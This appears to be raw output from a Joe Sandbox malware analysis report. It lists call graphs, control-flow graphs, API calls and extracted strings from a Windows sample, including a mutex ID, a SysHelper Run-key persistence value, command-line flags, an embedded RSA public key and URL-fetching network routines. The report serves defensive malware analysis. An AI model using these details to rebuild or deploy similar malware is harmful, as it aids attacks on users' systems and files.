LeaveCriticalSection _vwprintf_helper 42919->43024 42921->42789 42922->42789 42923->42789 42924->42789 42925->42892 42926->42894 42927->42896 42928->42902 42932 421ffe __initptd 42929->42932 42930 422010 42931 425208 __output_l 58 API calls 42930->42931 42933 422015 42931->42933 42932->42930 42934 42203d 42932->42934 42965 4242d2 9 API calls __output_l 42933->42965 42936 428df4 __getstream 61 API calls 42934->42936 42937 422042 42936->42937 42938 42204b 42937->42938 42939 422058 42937->42939 42942 425208 __output_l 58 API calls 42938->42942 42940 422081 42939->42940 42941 422061 42939->42941 42948 42b078 42940->42948 42943 425208 __output_l 58 API calls 42941->42943 42945 422020 __initptd @_EH4_CallFilterFunc@8 42942->42945 42943->42945 42945->42907 42956 42b095 42948->42956 42949 42b0a9 42950 425208 __output_l 58 API calls 42949->42950 42951 42b0ae 42950->42951 42970 4242d2 9 API calls __output_l 42951->42970 42952 42b2ac 42967 43fba6 42952->42967 42955 42208c 42966 4220ae LeaveCriticalSection LeaveCriticalSection _vwprintf_helper 42955->42966 42956->42949 42964 42b250 42956->42964 42971 43fbc4 58 API calls __mbsnbcmp_l 42956->42971 42958 42b216 42958->42949 42972 43fcf3 65 API calls __mbsnbicmp_l 42958->42972 42960 42b249 42960->42964 42973 43fcf3 65 API calls __mbsnbicmp_l 42960->42973 42962 42b268 42962->42964 42974 43fcf3 65 API calls __mbsnbicmp_l 42962->42974 42964->42949 42964->42952 42965->42945 42966->42945 42975 43fa8f 42967->42975 42969 43fbbf 42969->42955 42970->42955 42971->42958 42972->42960 42973->42962 42974->42964 42978 43fa9b __initptd 42975->42978 42976 43fab1 42977 425208 __output_l 58 API calls 42976->42977 42979 43fab6 42977->42979 42978->42976 42980 43fae7 42978->42980 42993 4242d2 9 API calls __output_l 42979->42993 42986 43fb58 42980->42986 42985 43fac0 __initptd 42985->42969 42995 427970 42986->42995 42989 43fb03 42994 43fb2c LeaveCriticalSection __unlock_fhandle 42989->42994 42990 43bac1 __wsopen_nolock 109 API calls 42991 43fb92 42990->42991 43016 420bed 58 API calls 2 library calls 42991->43016 42993->42985 42994->42985 42996 427993 42995->42996 42997 42797d 42995->42997 42996->42997 42999 42799a ___crtIsPackagedApp 42996->42999 42998 425208 __output_l 58 API calls 42997->42998 43000 427982 42998->43000 43002 4279a3 AreFileApisANSI 42999->43002 43003 4279b0 MultiByteToWideChar 42999->43003 43017 4242d2 9 API calls __output_l 43000->43017 43002->43003 43004 4279ad 43002->43004 43005 4279ca GetLastError 43003->43005 43006 4279db 43003->43006 43004->43003 43018 4251e7 58 API calls 2 library calls 43005->43018 43019 428cde 58 API calls 2 library calls 43006->43019 43009 42798c 43009->42989 43009->42990 43010 4279e3 43010->43009 43011 4279ea MultiByteToWideChar 43010->43011 43011->43009 43012 427a00 GetLastError 43011->43012 43020 4251e7 58 API calls 2 library calls 43012->43020 43014 427a0c 43021 420bed 58 API calls 2 library calls 43014->43021 43016->42989 43017->43009 43018->43009 43019->43010 43020->43014 43021->43009 43022->42912 43023->42919 43024->42912 43025->42868 43026 41b185 43027 41b190 43026->43027 43028 412de0 59 API calls 43027->43028 43029 41b1a5 GetUserNameW 43027->43029 43028->43027 43030 41b1c9 43029->43030 43031 412c40 59 API calls 43030->43031 43032 41b1d8 43031->43032 43033 412bf0 59 API calls 43032->43033 43034 41b1ea 43033->43034 43035 40ecb0 60 API calls 43034->43035 43057 41b1f3 43035->43057 43036 41b2f5 43037 4136c0 59 API calls 43036->43037 43038 41b308 43037->43038 43039 40ca70 59 API calls 43038->43039 43040 41b311 43039->43040 43041 4130b0 59 API calls 43040->43041 43042 41b322 43041->43042 43044 40c740 120 API calls 43042->43044 43043 412c40 59 API calls 43043->43057 43046 41b327 43044->43046 43045 412900 60 API calls 43045->43057 43048 4111c0 170 API calls 43046->43048 43047 413580 59 API calls 43047->43057 43049 41b33b 43048->43049 43086 41ba10 LoadCursorW RegisterClassExW 43049->43086 43051 41b343 43052 41ba80 3 API calls 43051->43052 43054 41b34b 43052->43054 43053 413100 59 API calls 43053->43057 43055 410a50 65 API calls 43054->43055 43056 41b34f 43054->43056 43059 41b379 43055->43059 43057->43036 43057->43043 43057->43045 43057->43047 43057->43053 43089 40f1f0 59 API calls 43057->43089 43060 413100 59 API calls 43059->43060 43061 41b3a5 43060->43061 43062 413580 59 API calls 43061->43062 43085 41b3b3 43062->43085 43063 41b48b 43088 41fdc0 CreateThread 43063->43088 43065 41b49f GetMessageW 43066 41b4ed 43065->43066 43067 41b4bf 43065->43067 43070 41b502 PostThreadMessageW 43066->43070 43071 41b55b 43066->43071 43068 41b4c5 TranslateMessage DispatchMessageW GetMessageW 43067->43068 43068->43066 43068->43068 43069 41c330 59 API calls 43069->43085 43074 41b510 PeekMessageW 43070->43074 43072 41b564 PostThreadMessageW 43071->43072 43073 41b5bb 43071->43073 43075 41b570 PeekMessageW 43072->43075 43073->43056 43080 41b5d2 CloseHandle 43073->43080 43076 41b546 WaitForSingleObject 43074->43076 43077 41b526 DispatchMessageW PeekMessageW 43074->43077 43078 41b5a6 WaitForSingleObject 43075->43078 43079 41b586 DispatchMessageW PeekMessageW 43075->43079 43076->43071 43076->43074 43077->43076 43077->43077 43078->43073 43078->43075 43079->43078 43079->43079 43080->43056 43081 41c240 59 API calls 43081->43085 43082 41b8b0 59 API calls 43082->43085 43083 413260 59 API calls 43083->43085 43085->43063 43085->43069 43085->43081 43085->43082 43085->43083 43087 41fa10 CreateThread 43085->43087 43086->43051 43087->43085 43090 41f130 219 API calls _LanguageEnumProc@4 43087->43090 43088->43065 43091 41fd80 64 API calls 43088->43091 43089->43057 43092 481920 43093 42f7c0 __write_nolock 43092->43093 43094 481943 GetVersionExA LoadLibraryA LoadLibraryA LoadLibraryA 43093->43094 43095 481a0b 43094->43095 43096 4819e2 GetProcAddress GetProcAddress 43094->43096 43099 481a1b NetStatisticsGet 43095->43099 43111 481aab 43095->43111 43096->43095 43097 481acb 43100 481ad5 GetProcAddress GetProcAddress GetProcAddress 43097->43100 43128 481b0d __write_nolock 43097->43128 43098 481ac4 FreeLibrary 43098->43097 43101 481a69 NetStatisticsGet 43099->43101 43102 481a33 __write_nolock 43099->43102 43100->43128 43103 481a87 __write_nolock 43101->43103 43101->43111 43106 45d550 101 API calls 43102->43106 43107 45d550 101 API calls 43103->43107 43104 481c1b 43108 481c31 LoadLibraryA 43104->43108 43109 481c24 43104->43109 43105 481c14 FreeLibrary 43105->43104 43110 481a5a 43106->43110 43107->43111 43113 481c4a GetProcAddress GetProcAddress GetProcAddress 43108->43113 43114 481d4b 43108->43114 43192 4549a0 13 API calls 4 library calls 43109->43192 43110->43101 43111->43097 43111->43098 43124 481c84 __write_nolock 43113->43124 43134 481cac __write_nolock 43113->43134 43116 481d59 12 API calls 43114->43116 43117 48223f 43114->43117 43115 481c29 43115->43108 43115->43114 43119 481e5c 43116->43119 43120 482233 FreeLibrary 43116->43120 43180 482470 43117->43180 43119->43120 43141 481ed9 CreateToolhelp32Snapshot 43119->43141 43120->43117 43122 481d3f FreeLibrary 43122->43114 43123 48225b __write_nolock 43126 45d550 101 API calls 43123->43126 43125 45d550 101 API calls 43124->43125 43125->43134 43129 482276 GetCurrentProcessId 43126->43129 43127 481d03 __write_nolock 43127->43122 43133 45d550 101 API calls 43127->43133 43130 481bee 43128->43130 43131 45d550 101 API calls 43128->43131 43137 481b7c __write_nolock 43128->43137 43132 48228f __write_nolock 43129->43132 43130->43104 43130->43105 43131->43137 43138 45d550 101 API calls 43132->43138 43135 481d3c 43133->43135 43134->43127 43136 45d550 101 API calls 43134->43136 43135->43122 43136->43127 43137->43130 43139 45d550 101 API calls 43137->43139 43140 4822aa 43138->43140 43139->43130 43142 42a77e __output_l 6 API calls 43140->43142 43141->43120 43143 481ef0 43141->43143 43144 4822ca 43142->43144 43145 481f03 GetTickCount 43143->43145 43146 481f15 Heap32ListFirst 43143->43146 43145->43146 43147 482081 43146->43147 43152 481f28 __write_nolock 43146->43152 43148 48209d Process32First 43147->43148 43149 482095 GetTickCount 43147->43149 43150 48210a 43148->43150 43157 4820b4 __write_nolock 43148->43157 43149->43148 43151 482118 GetTickCount 43150->43151 43165 482120 __write_nolock 43150->43165 43151->43165 43152->43147 43159 48204e Heap32ListNext 43152->43159 43160 482066 GetTickCount 43152->43160 43163 45d550 101 API calls 43152->43163 43170 481ff1 GetTickCount 43152->43170 43174 45d550 43152->43174 43154 481f56 Heap32First 43154->43152 43155 45d550 101 API calls 43155->43157 43156 482196 43158 4821a4 GetTickCount 43156->43158 43171 4821ac __write_nolock 43156->43171 43157->43150 43157->43155 43164 4820fb GetTickCount 43157->43164 43158->43171 43159->43147 43159->43152 43160->43147 43160->43152 43161 482219 43167 482229 43161->43167 43168 48222d CloseHandle 43161->43168 43162 45d550 101 API calls 43162->43165 43166 481fd9 Heap32Next 43163->43166 43164->43150 43164->43157 43165->43156 43165->43162 43172 482187 GetTickCount 43165->43172 43166->43152 43167->43120 43168->43120 43169 45d550 101 API calls 43169->43171 43170->43152 43171->43161 43171->43169 43173 48220a GetTickCount 43171->43173 43172->43156 43172->43165 43173->43161 43173->43171 43175 45d559 43174->43175 43178 45d57d __write_nolock 43174->43178 43193 46b5d0 101 API calls __except_handler4 43175->43193 43177 45d55f 43177->43178 43194 45a5e0 101 API calls __except_handler4 43177->43194 43178->43154 43181 48247a __write_nolock 43180->43181 43182 4824c3 GetTickCount 43181->43182 43183 482483 QueryPerformanceCounter 43181->43183 43184 4824d6 __write_nolock 43182->43184 43185 482499 __write_nolock 43183->43185 43186 482492 43183->43186 43187 45d550 101 API calls 43184->43187 43188 45d550 101 API calls 43185->43188 43186->43182 43189 4824ea 43187->43189 43190 4824b7 43188->43190 43191 482244 GlobalMemoryStatus 43189->43191 43190->43182 43190->43191 43191->43123 43192->43115 43193->43177 43194->43178
                                                                                                APIs
                                                                                                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,007FB5F0,?), ref: 0041A0BB
                                                                                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                • API String ID: 2957410896-526584959
                                                                                                • Opcode ID: 1edb2e237a79b2b4ae5a4da75d993a068dfe183a2f65f8032ee2256dc2203c06
                                                                                                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                • Opcode Fuzzy Hash: 1edb2e237a79b2b4ae5a4da75d993a068dfe183a2f65f8032ee2256dc2203c06
                                                                                                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 606 481920-4819e0 call 42f7c0 GetVersionExA LoadLibraryA * 3 609 481a0b-481a0d 606->609 610 4819e2-481a05 GetProcAddress * 2 606->610 611 481aba-481ac2 609->611 612 481a13-481a15 609->612 610->609 613 481acb-481ad3 611->613 614 481ac4-481ac5 FreeLibrary 611->614 612->611 615 481a1b-481a31 NetStatisticsGet 612->615 616 481b0d 613->616 617 481ad5-481b0b GetProcAddress * 3 613->617 614->613 618 481a69-481a85 NetStatisticsGet 615->618 619 481a33-481a5d call 42f7c0 call 45d550 615->619 621 481b0f-481b17 616->621 617->621 618->611 620 481a87-481aae call 42f7c0 call 45d550 618->620 619->618 620->611 625 481c0a-481c12 621->625 626 481b1d-481b23 621->626 628 481c1b-481c22 625->628 629 481c14-481c15 FreeLibrary 625->629 626->625 631 481b29-481b2b 626->631 633 481c31-481c44 LoadLibraryA 628->633 634 481c24-481c2b call 4549a0 628->634 629->628 631->625 636 481b31-481b42 631->636 639 481c4a-481c82 GetProcAddress * 3 633->639 640 481d4b-481d53 633->640 634->633 634->640 643 481b45-481b47 636->643 641 481caf-481cb7 639->641 642 481c84 639->642 645 481d59-481e56 GetProcAddress * 12 640->645 646 48223f-482256 call 482470 GlobalMemoryStatus call 42f7c0 640->646 650 481cb9-481cc0 641->650 651 481d06-481d08 641->651 654 481c86-481cac call 42f7c0 call 45d550 642->654 647 481b98-481bb4 643->647 648 481b49-481b5d 643->648 652 481e5c-481e63 645->652 653 482233-482239 FreeLibrary 645->653 671 48225b-4822cd call 45d550 GetCurrentProcessId call 42f7c0 call 45d550 call 42a77e 646->671 647->625 673 481bb6-481bca 647->673 669 481b8a-481b8c 648->669 670 481b5f-481b84 call 42f7c0 call 45d550 648->670 658 481ccb-481ccd 650->658 659 481cc2-481cc9 650->659 656 481d0a-481d3c call 42f7c0 call 45d550 651->656 657 481d3f-481d45 FreeLibrary 651->657 652->653 660 481e69-481e70 652->660 653->646 654->641 656->657 657->640 658->651 665 481ccf-481cde 658->665 659->651 659->658 660->653 661 481e76-481e7d 660->661 661->653 667 481e83-481e8a 661->667 665->651 686 481ce0-481d03 call 42f7c0 call 45d550 665->686 667->653 674 481e90-481e97 667->674 669->647 670->669 687 481bfc-481bfe 673->687 688 481bcc-481bf6 call 42f7c0 call 45d550 673->688 674->653 681 481e9d-481ea4 674->681 681->653 689 481eaa-481eb1 681->689 686->651 687->625 688->687 689->653 696 481eb7-481ebe 689->696 696->653 702 481ec4-481ecb 696->702 702->653 706 481ed1-481ed3 702->706 706->653 709 481ed9-481eea CreateToolhelp32Snapshot 706->709 709->653 711 481ef0-481f01 709->711 713 481f03-481f0f GetTickCount 711->713 714 481f15-481f22 Heap32ListFirst 711->714 713->714 715 481f28-481f2d 714->715 716 482081-482093 714->716 719 481f33-481f9d call 42f7c0 call 45d550 Heap32First 715->719 717 48209d-4820b2 Process32First 716->717 718 482095-482097 GetTickCount 716->718 720 48210a-482116 717->720 721 4820b4-4820f5 call 42f7c0 call 45d550 717->721 718->717 734 481f9f-481faa 719->734 735 482015-482060 Heap32ListNext 719->735 724 482118-48211a GetTickCount 720->724 725 482120-482135 720->725 721->720 749 4820f7-4820f9 721->749 724->725 732 482196-4821a2 725->732 733 482137 725->733 739 4821ac-4821c1 732->739 740 4821a4-4821a6 GetTickCount 732->740 737 482140-482181 call 42f7c0 call 45d550 733->737 738 481fb0-481feb call 42f7c0 call 45d550 Heap32Next 734->738 735->716 745 482062-482064 735->745 737->732 771 482183-482185 737->771 763 481fed-481fef 738->763 764 48200f 738->764 752 482219-482227 739->752 753 4821c3-482204 call 42f7c0 call 45d550 739->753 740->739 750 482079-48207b 745->750 751 482066-482077 GetTickCount 745->751 749->721 756 4820fb-482108 GetTickCount 749->756 750->716 750->719 751->716 751->750 760 482229-48222b 752->760 761 48222d CloseHandle 752->761 753->752 774 482206-482208 753->774 756->720 756->721 760->653 761->653 767 481ff1-482002 GetTickCount 763->767 768 482004-48200d 763->768 764->735 767->764 767->768 768->738 768->764 771->737 772 482187-482194 GetTickCount 771->772 772->732 772->737 774->753 775 48220a-482217 GetTickCount 774->775 775->752 775->753
                                                                                                APIs
                                                                                                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                                                                                                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                                                                                                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                                                                                                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                                                                                                • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00481A2D
                                                                                                • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00481A81
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                                                                                                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                                                                                                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                                                                                                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00481C15
                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                                                                                                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                                                                                                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                                                                                                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                                                                                                • FreeLibrary.KERNEL32(?), ref: 00481D45
                                                                                                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                                                                                                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                                                                                                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                                                                                                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                                                                                                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                                                                                                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                                                                                                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                                                                                                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                                                                                                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                                                                                                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                                                                                                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                                                                                                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00481EDD
                                                                                                • GetTickCount.KERNEL32 ref: 00481F03
                                                                                                • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00481F1A
                                                                                                • Heap32First.KERNEL32(00000024,?,?), ref: 00481F95
                                                                                                • Heap32Next.KERNEL32(?,?,?,?,?,B6EAEE0D), ref: 00481FE3
                                                                                                • GetTickCount.KERNEL32 ref: 00481FF1
                                                                                                • Heap32ListNext.KERNEL32(?,?), ref: 00482058
                                                                                                • GetTickCount.KERNEL32 ref: 00482066
                                                                                                • GetTickCount.KERNEL32 ref: 00482095
                                                                                                • Process32First.KERNEL32(?,00000128), ref: 004820AA
                                                                                                • GetTickCount.KERNEL32 ref: 004820FB
                                                                                                • GetTickCount.KERNEL32 ref: 00482118
                                                                                                • GetTickCount.KERNEL32 ref: 00482187
                                                                                                • GetTickCount.KERNEL32 ref: 004821A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                • API String ID: 4174345323-1723836103
                                                                                                • Opcode ID: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
                                                                                                • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                                                                                                • Opcode Fuzzy Hash: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
                                                                                                • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 776 41e690-41e6d8 call 42f7c0 timeGetTime call 423f74 call 40c6a0 783 41e6e0-41e6e6 776->783 784 41e6f0-41e722 call 42b420 call 40c500 783->784 789 41e724-41e729 784->789 790 41e72e-41e772 InternetOpenW 784->790 791 41ea1f-41ea40 call 423cf0 789->791 792 41e774-41e776 790->792 793 41e778-41e77d 790->793 800 41ea42-41ea46 791->800 801 41ea8d-41eacc lstrlenA lstrcpyA * 2 lstrlenA 791->801 796 41e78f-41e7b8 call 415ae0 call 421c02 792->796 794 41e780-41e789 793->794 794->794 797 41e78b-41e78d 794->797 816 41e882-41e8e5 call 415ae0 call 413ff0 call 412900 call 4159d0 796->816 817 41e7be-41e7f7 call 414690 call 40dd40 796->817 797->796 805 41ee2a-41ee3a call 411b10 800->805 806 41ea4c-41ea61 SHGetFolderPathA 800->806 803 41eaef-41eb12 801->803 804 41eace 801->804 812 41eb14-41eb16 803->812 813 41eb18-41eb1f 803->813 808 41ead0-41ead8 804->808 823 41ee4d-41ee82 call 40ef50 805->823 824 41ee3c-41ee3f 805->824 806->784 809 41ea67-41ea88 PathAppendA DeleteFileA 806->809 814 41eaeb 808->814 815 41eada-41eae7 lstrlenA 808->815 809->784 819 41eb2b-41eb4f call 4156d0 call 412900 812->819 820 41eb22-41eb27 813->820 814->803 815->808 821 41eae9 815->821 873 41e8f3-41e917 lstrcpyW 816->873 874 41e8e7-41e8f0 call 422587 816->874 845 41e7f9-41e7fe 817->845 846 41e86f-41e874 817->846 843 41eb51 819->843 844 41eb53-41eb66 lstrcpyW 819->844 820->820 826 41eb29 820->826 821->803 838 41ee86-41ee8c 823->838 824->783 826->819 840 41ee92-41ee94 838->840 841 41ee8e-41ee90 838->841 849 41ee97-41ee9c 840->849 847 41eea0-41eeaf call 413ea0 841->847 843->844 850 41eb74-41ebe4 lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW call 423cf0 844->850 851 41eb68-41eb71 call 422587 844->851 853 41e800-41e809 call 422587 845->853 854 41e80c-41e827 845->854 846->816 852 41e876-41e87f call 422587 846->852 847->838 875 41eeb1-41eee3 call 40ef50 847->875 849->849 858 41ee9e 849->858 901 41ebe6-41ebea 850->901 902 41ec3d-41ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 850->902 851->850 852->816 853->854 855 41e842-41e848 854->855 856 41e829-41e82d 854->856 865 41e84e-41e86c 855->865 864 41e82f-41e840 call 4205a0 856->864 856->865 858->847 864->865 865->846 879 41e943-41e97a InternetOpenUrlW InternetReadFile 873->879 880 41e919-41e920 873->880 874->873 893 41eee7-41eeed 875->893 887 41e9ec-41ea08 InternetCloseHandle * 2 879->887 888 41e97c-41e994 SHGetFolderPathA 879->888 880->879 884 41e922-41e92e 880->884 891 41e930-41e935 884->891 892 41e937 884->892 889 41ea16-41ea19 887->889 890 41ea0a-41ea13 call 422587 887->890 888->887 895 41e996-41e9c2 PathAppendA call 4220b6 888->895 889->791 890->889 898 41e93c-41e93d lstrcatW 891->898 892->898 899 41eef3-41eef5 893->899 900 41eeef-41eef1 893->900 895->887 912 41e9c4-41e9e4 lstrlenA call 422b02 call 423a38 895->912 898->879 908 41eef8-41eefd 899->908 907 41ef01-41ef10 call 413ea0 900->907 901->805 909 41ebf0-41ec11 SHGetFolderPathA 901->909 904 41ec99 902->904 905 41ecbf-41ecdd 902->905 913 41eca0-41eca8 904->913 914 41ece3-41eced 905->914 915 41ecdf-41ece1 905->915 907->893 923 41ef12-41ef4c call 413ff0 call 412900 907->923 908->908 916 41eeff 908->916 909->784 911 41ec17-41ec38 PathAppendA DeleteFileA 909->911 911->783 932 41e9e9 912->932 919 41ecbb 913->919 920 41ecaa-41ecb7 lstrlenA 913->920 922 41ecf0-41ecf5 914->922 921 41ecf9-41ed1b call 4156d0 call 412900 915->921 916->907 919->905 920->913 925 41ecb9 920->925 936 41ed1d 921->936 937 41ed1f-41ed35 lstrcpyW 921->937 922->922 926 41ecf7 922->926 941 41ef50-41ef68 lstrcpyW 923->941 942 41ef4e 923->942 925->905 926->921 932->887 936->937 939 41ed43-41edab lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW lstrlenW 937->939 940 41ed37-41ed40 call 422587 937->940 957 41edad-41edb6 lstrlenW 939->957 958 41edbc-41edc1 939->958 940->939 945 41ef76-41efb3 call 413ff0 call 412900 941->945 946 41ef6a-41ef73 call 422587 941->946 942->941 959 41efb5 945->959 960 41efb7-41efc6 lstrcpyW 945->960 946->945 957->958 961 41ee44-41ee48 957->961 962 41ee10-41ee12 958->962 963 41edc3-41ede4 SHGetFolderPathA 958->963 959->960 966 41efd4-41efe0 960->966 967 41efc8-41efd1 call 422587 960->967 968 41f01a-41f030 961->968 964 41ee14-41ee15 call 420bed 962->964 965 41ee1d-41ee1f 962->965 963->784 969 41edea-41ee0b PathAppendA DeleteFileA 963->969 975 41ee1a 964->975 965->805 971 41ee21-41ee27 call 420bed 965->971 973 41efe2-41efeb call 422587 966->973 974 41efee-41f008 966->974 967->966 969->783 971->805 973->974 979 41f016 974->979 980 41f00a-41f013 call 422587 974->980 975->965 979->968 980->979
                                                                                                APIs
                                                                                                • timeGetTime.WINMM(?,?,?,?,?,004CB3EC,000000FF), ref: 0041E6C0
                                                                                                  • Part of subcall function 0040C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                                                                                                  • Part of subcall function 0040C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                  • Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                • _memset.LIBCMT ref: 0041E707
                                                                                                  • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                • InternetOpenW.WININET ref: 0041E743
                                                                                                • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                • _memmove.LIBCMT ref: 0041E838
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
